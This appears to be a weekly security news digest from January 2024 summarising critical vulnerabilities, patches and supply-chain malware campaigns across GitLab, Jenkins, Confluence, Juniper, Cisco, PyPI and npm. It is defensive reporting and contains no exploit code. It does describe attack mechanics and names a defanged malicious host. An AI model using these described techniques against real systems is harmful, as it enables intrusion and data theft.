01/24/2024-01/31/2024 Upgrade GitLab, Urgent Junos OS Updates, Critical Jenkins Vulnerability, Malicious PyPI Packages And More.

1. URGENT: Upgrade GitLab – Critical Workspace Creation Flaw Allows File Overwrite

GitLab once again released fixes to address a critical security flaw in its Community Edition (CE) and Enterprise Edition (EE) that could be exploited to write arbitrary files while creating a workspace. Tracked as CVE-2024-0402, the vulnerability has a CVSS score of 9.9 out of a maximum of 10. The company also noted patches for the bug have been backported to 16.5.8, 16.6.6, 16.7.4, and 16.8.1. Also resolved by GitLab are four medium-severity flaws that could lead to a regular expression denial-of-service (ReDoS), HTML injection, and the disclosure of a user’s public email address via the tags RSS feed. The latest update arrives two weeks after the DevSecOps platform shipped fixes to close out two critical shortcomings, including one that could be exploited to take over accounts without requiring any user interaction (CVE-2023-7028, CVSS score: 10.0). Users are advised to upgrade the installations to a patched version as soon as possible to mitigate potential risks.

2. Juniper Networks Releases Urgent Junos OS Updates for High-Severity Flaws

Juniper Networks has issued critical updates for SRX Series and EX Series, targeting high-severity vulnerabilities in J-Web (CVE-2024-21619 and CVE-2024-21620). These flaws could empower threat actors to seize control of vulnerable systems. CVE-2024-21619 poses a moderate risk (CVSS score: 5.3) due to a missing authentication vulnerability, exposing sensitive configuration information. On the other hand, CVE-2024-21620 presents a higher risk (CVSS score: 8.8) as a cross-site scripting (XSS) vulnerability, enabling the execution of arbitrary commands. As a temporary measure, Juniper advises users to disable J-Web or limit access to trusted hosts until the updates are implemented. Additionally, two earlier disclosed vulnerabilities (CVE-2023-36846 and CVE-2023-36851) were previously flagged as actively exploited.

3. Critical Jenkins Vulnerability Exposes Servers to RCE Attacks – Patch ASAP!

Jenkins, the open-source CI/CD automation software, has patched nine security flaws, including CVE-2024-23897, a critical bug allowing remote code execution through an arbitrary file read vulnerability in the CLI. Jenkins uses the args4j library for CLI command processing, enabling a feature (expandAtFiles) that replaces ‘@’ followed by a file path with the file’s content. This feature, active by default in Jenkins 2.441 and earlier, could be exploited by threat actors with “Overall/Read” permission to read entire files, potentially leading to various attacks, including remote code execution, XSS, and CSRF protection bypass. SonarSource researcher Yaniv Nizry discovered the flaw, fixed in Jenkins 2.442 and LTS 2.426.3 by disabling the command parser feature. While awaiting the patch, users are advised to disable CLI access as a temporary measure. Proof-of-concept exploits for CVE-2024-23897 have been published, emphasizing the urgency of updates.

4. Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines

Researchers have detected malicious packages on the Python Package Index (PyPI), distributing WhiteSnake Stealer malware on Windows systems. These packages, uploaded by a threat actor named “WS,” include nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. The packages embed Base64-encoded source code in their setup.py files, delivering the final payload upon installation based on the victim’s operating system. WhiteSnake, primarily targeting Windows, has an Anti-VM mechanism, communicates via Tor, and steals information from browsers, cryptocurrency wallets, and various applications. PYTA31, the threat actor tracked by Checkmarx, aims to exfiltrate sensitive and crypto wallet data. Some packages incorporate clipper functionality to replace clipboard content for unauthorized transactions. This discovery highlights the ability of a single malware author to disseminate multiple info-stealing packages into PyPI with distinct payload intricacies.

5. Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords

A recently patched security flaw in Microsoft Outlook (CVE-2023-35636, CVSS score: 6.5) exposed NT LAN Manager (NTLM) v2 hashed passwords. This vulnerability, addressed in Microsoft’s December 2023 Patch Tuesday updates, allowed threat actors to access passwords when victims opened a specially crafted file. In email attacks, the attacker sends the file, while in web-based attacks, a malicious website hosts it. The flaw originates from the calendar-sharing function in Outlook, utilizing crafted headers. Varonis researcher Dolev Taler discovered the bug, highlighting the potential leakage of NTLM hashes via Windows Performance Analyzer (WPA) and Windows File Explorer, yet these methods remain unpatched. This disclosure coincides with Check Point’s revelation of “forced authentication,” demonstrating the exploitation of NTLM tokens by tricking users into opening a rogue Microsoft Access file.

6. Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems

Cisco has issued patches for a critical vulnerability (CVE-2024-20253, CVSS score: 9.9) affecting Unified Communications and Contact Center Solutions. The flaw arises from improper processing of user-provided data, enabling a remote attacker to execute arbitrary code on the target device. Successful exploitation could lead to arbitrary command execution with web services user privileges and potential root access. The affected products include Unified Communications Manager, Unified Communications Manager IM & Presence Service, Unified Communications Manager Session Management Edition, Unified Contact Center Express, Unity Connection, and Virtualized Voice Browser. Synacktiv researcher Julien Egloff discovered the vulnerability. While no workarounds exist, Cisco recommends implementing access control lists (ACLs) as a temporary measure.

01/17/2024-01/24/2024 Malicious NPM Packages, ~40,000 Attacks in 3 Days, MavenGate Attack Could Let Hackers Hijack Java And More.

1. Patch Your GoAnywhere MFT Immediately – Critical Flaw Lets Anyone Be Admin

A critical security flaw has been disclosed in Fortra’s GoAnywhere Managed File Transfer (MFT) software that could be abused to create a new administrator user. Tracked as CVE-2024-0204, the issue carries a CVSS score of 9.8 out of 10. Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. The issue is the result of a path traversal weakness in the “/InitialAccountSetup.xhtml” endpoint that could be exploited to create administrative users. Users who cannot upgrade to version 7.4.1 can apply temporary workarounds in non-container deployments by deleting the InitialAccountSetup.xhtml file in the install directory and restarting the services.

2. Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub

Malicious npm packages, warbeast2000 and kodiak2k, discovered using GitHub to store stolen Base64-encrypted SSH keys from developers. Uploaded at the beginning of the month, the packages attracted 412 and 1,281 downloads before npm took them down on January 21, 2024. Security firm ReversingLabs revealed eight versions of warbeast2000 and over 30 versions of kodiak2k. Both execute postinstall scripts, with warbeast2000 attempting to access private SSH keys and kodiak2k searching for a key named “meow.” Lucija Valentić, a security researcher, explained that warbeast2000 uploads the key to an attacker-controlled GitHub repo. Kodiak2k’s later versions execute a script from an archived GitHub project, launching the Mimikatz tool to extract credentials. Valentić emphasizes this incident showcases cybercriminals exploiting open-source package managers for malicious software supply chain attacks on development and end-user organizations.

3. ~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations. The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5. Over 11,000 Atlassian instances have been found to be accessible over the internet as of January 21, 2024, although it’s currently not known how many of them are vulnerable to CVE-2023-22527. This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands. 

4. PixieFail UEFI Flaws Expose Millions of Computers to RCE, DoS, and Data Theft

Multiple security vulnerabilities, collectively named PixieFail by Quarkslab, have been revealed in the TCP/IP network protocol stack of the widely used Unified Extensible Firmware Interface (UEFI) specification. These nine issues, found in the TianoCore EFI Development Kit II (EDK II), can lead to remote code execution, denial-of-service (DoS), DNS cache poisoning, and sensitive information leakage. UEFI firmware from major providers like AMI, Intel, Insyde, and Phoenix Technologies are affected. The vulnerabilities stem from overflow bugs, out-of-bounds reads, infinite loops, and a weak pseudorandom number generator in EDK II’s NetworkPkg, impacting PXE functionality during the Preboot eXecution Environment (PXE) stage. The vulnerabilities have specific identifiers (CVEs) and varying CVSS scores. The impact and exploitability depend on firmware builds and default PXE boot configurations, with potential for remote code execution, DoS, DNS cache poisoning, or data extraction.

5. MavenGate Attack Could Let Hackers Hijack Java and Android via Abandoned Libraries

Numerous widely-used Java and Android libraries are vulnerable to a novel software supply chain attack called MavenGate. Oversecured reported that domain name purchases could be used to hijack project access, exploiting default build configurations and making attacks difficult to detect. The attack can inject malicious code into dependencies, compromising the build process via a malicious plugin. All Maven-based technologies, including Gradle, are susceptible, affecting over 200 companies like Google, Facebook, and Amazon. Apache Maven, vital for Java projects, is a target due to potentially compromised dependencies in public repositories. The attack involves obtaining expired domains, asserting rights through a DNS TXT record, and gaining access to vulnerable groupIds. While Maven Central believes the outlined attack is infeasible due to automation, Oversecured suggests developers and end-users play crucial roles in ensuring security for direct and transitive dependencies, emphasizing the responsibility of both parties.

6. U.S. Cybersecurity Agency Warns of Actively Exploited Ivanti EPMM Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw, CVE-2023-35082, affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core to its Known Exploited Vulnerabilities catalog. The flaw, now patched, is an authentication bypass that could potentially expose users’ personal information. Ivanti disclosed the vulnerability in August 2023, urging users to update to version 11.11.0.0. The flaw could be chained with CVE-2023-35081 to allow attackers to write malicious web shell files. Though there’s no detail on real-world exploits, federal agencies are advised to apply fixes by February 8, 2024. Two zero-day flaws in Ivanti Connect Secure VPN devices are also under mass exploitation, prompting the company to release updates next week. The attacks, initially linked to a Chinese threat actor, have since attracted additional threat actors globally, compromising over 2,100 devices across various sectors. Organizations are urged to apply Ivanti’s provided mitigation after importing backup configurations to prevent re-compromise.

01/10/2024-01/17/2024 Citrix, VMware, and Atlassian Hit with Critical Flaws, SonicWall Firewalls Potentially Vulnerable, Critical RCE Vulnerability And More.

1. GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials

GitHub responded to a security vulnerability by rotating keys, including the GitHub commit signing key and customer encryption keys for GitHub Actions, Codespaces, and Dependabot. Discovered on December 26, 2023, the high-severity vulnerability (CVE-2024-0200, CVSS score: 7.2) was promptly addressed. While there’s no evidence of exploitation, GitHub urges users to import the new keys. GitHub Enterprise Server (GHES) is also affected, but exploiting it requires an authenticated user with an organization owner role logged into a GHES instance, limiting potential risks. Another high-severity bug (CVE-2024-0507, CVSS score: 6.5) was patched, allowing an attacker with Management Console user account access and editor role to escalate privileges through command injection. GitHub emphasizes user security following previous incidents, such as replacing the RSA SSH host key.

2. Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC)and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below:

• CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management interface access)
• CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or authorization and accounting, or AAA, virtual server).

Users of NetScaler ADC and NetScaler Gateway version 12.1 are recommended to upgrade their appliances to a supported version that patches the flaws. In recent months, multiple security vulnerabilities in Citrix appliances (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.

3. Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits – Act Now

Over 178,000 exposed SonicWall firewalls face potential exploitation from two security flaws, leading to denial-of-service (DoS) conditions and remote code execution (RCE). Jon Williams, a senior security engineer at Bishop Fox, highlights the commonality in the vulnerabilities, manifested in different HTTP URI paths due to code pattern reuse. The flaws, namely CVE-2022-22274 (CVSS score: 9.4) and CVE-2023-0656 (CVSS score: 7.5), involve stack-based buffer overflows in SonicOS. These vulnerabilities allow remote, unauthenticated attackers to induce DoS or potentially execute code, posing significant risks. The cybersecurity firm warns of potential weaponization, causing repeated crashes and forcing the appliance into maintenance mode, necessitating administrative intervention to restore normal functionality.

4. Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

Thousands of WordPress sites, using a vulnerable version of the Popup Builder plugin, face compromise by the Balada Injector malware. First identified by Doctor Web in January 2023, this ongoing campaign exploits security flaws in WordPress plugins to inject a backdoor, redirecting visitors to fraudulent tech support pages and scams. Sucuri’s recent findings reveal the extensive operation, active since 2017, infiltrating over 1 million sites. Balada Injector exploits a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8), disclosed by WPScan and patched in version 4.2.3. The attackers aim to insert a malicious JavaScript file hosted on specialcraftbox[.]com, gaining control over sites and facilitating malicious redirects. Persistent control involves uploading backdoors and creating rogue administrators. In the latest wave, logged-in admin cookies trigger the installation of a rogue backdoor plugin, fetching a second-stage payload. This payload, saved as “sasas,” scans for site directories, modifying wp-blog-header.php to inject the Balada JavaScript malware.

5. Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches

Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591, is rated 9.8 on the CVSS scoring system. An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS) or Remote Code Execution (RCE) and obtain root privileges on the device. The issue is caused by use of an insecure function allowing a bad actor to overwrite arbitrary memory. As temporary workarounds until the fixes are deployed, the company recommends that users disable J-Web or restrict access to only trusted hosts.  Additionally, Juniper Networks resolved a high-severity bug (CVE-2024-21611, CVSS score: 7.5) in Junos OS and Junos OS Evolved, potentially causing a DoS condition. Although there’s no evidence of exploitation, the company addresses these vulnerabilities following security issues with SRX firewalls and EX switches exploited by threat actors last year.

6. New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems

Researchers have developed a proof-of-concept (PoC) exploiting a critical flaw (CVE-2023-51467, CVSS score: 9.8) in Apache OFBiz ERP system, allowing execution of a memory-resident payload. This vulnerability serves as a bypass for another severe flaw (CVE-2023-49070, CVSS score: 9.8) in the same software, enabling authentication circumvention and remote code execution. Though fixed in Apache OFBiz version 18.12.11, threat actors are attempting to exploit it in vulnerable instances. VulnCheck’s latest findings reveal that CVE-2023-51467 permits executing a payload directly from memory, leaving minimal traces. Apache OFBiz has a history of exploited vulnerabilities, with the recent bug joining the ranks. Despite security measures, the incomplete nature of the sandbox in the system allows potential attackers to run curl commands and obtain a bash reverse shell on Linux systems.

7. Act Now: CISA Flags Active Exploitation of Microsoft SharePoint Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical privilege escalation vulnerability (CVE-2023-29357, CVSS score: 9.8) in Microsoft SharePoint Server to its Known Exploited Vulnerabilities catalog due to ongoing attacks. The flaw allows attackers with access to spoofed JWT authentication tokens to execute a network attack, bypassing authentication and gaining administrator privileges without any user action. Microsoft patched the bug in June 2023, part of its Patch Tuesday updates. While real-world exploitation details and threat actor identities are unknown, federal agencies are urged to apply patches by January 31, 2024. Microsoft emphasizes protection for customers with automatic updates enabled.